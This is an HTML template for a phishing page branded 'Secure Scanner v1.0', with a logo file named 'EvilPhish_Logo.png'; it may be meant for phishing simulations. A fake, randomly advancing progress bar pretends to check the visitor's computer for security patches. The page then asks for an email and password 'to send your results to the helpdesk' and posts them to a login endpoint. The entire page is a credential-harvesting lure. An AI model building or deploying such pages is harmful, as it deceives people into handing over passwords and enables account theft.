<!DOCTYPE html>
<html>
<head>
  <title>Secure Scanner v1.0</title>
  <link rel="stylesheet" type="text/css" href="{{ url_for('static', filename='css/styles.css') }}">
</head>
<body>
  <div class="container">
    <img src="{{ url_for('static', filename='images/EvilPhish_Logo.png') }}" alt="Company Logo">

    <div class="loading-bar">
      <div class="loading-progress"></div>
    </div>

    <div id="status"></div>

    <div class="login-form">
      <form action="/login" method="POST">
        <input type="email" placeholder="Email" name="email">
        <br>
        <input type="password" placeholder="Password" name="password">
        <br>
        <button onclick="verifyPatchCompletion()">Sign In</button>
      </form>
    </div>

    <div class="footer">
      <p>Secure Scanner v1.0</p>
    </div>
  </div>

  <script>
    // Checking for Patches
    function checkPatches() {
      var progressBar = document.querySelector('.loading-progress');
      var status = document.querySelector('#status');
      var percent = 0;

      var interval = setInterval(function() {
        percent += Math.random() * 10;
        percent = Math.min(percent, 100);

        progressBar.style.width = percent + '%';

        if (percent >= 100) {
          clearInterval(interval);
          progressBar.style.width = '100%';
          progressBar.style.backgroundColor = 'limegreen';
          setTimeout(function() {
            status.innerHTML = 'Verification complete, please login to send your results to the helpdesk.';
          }, 1000);
          // You can add your own logic here to perform further actions if necessary
        } else {
          status.innerHTML = 'Please standby while we verify your computer has the latest security patches.';
          progressBar.style.backgroundColor = 'red';
        }
      }, 500);
    }

    function verifyPatchCompletion() {
      alert('Please select "ok" to continue.');
    }

    checkPatches();
  </script>
</body>
</html>
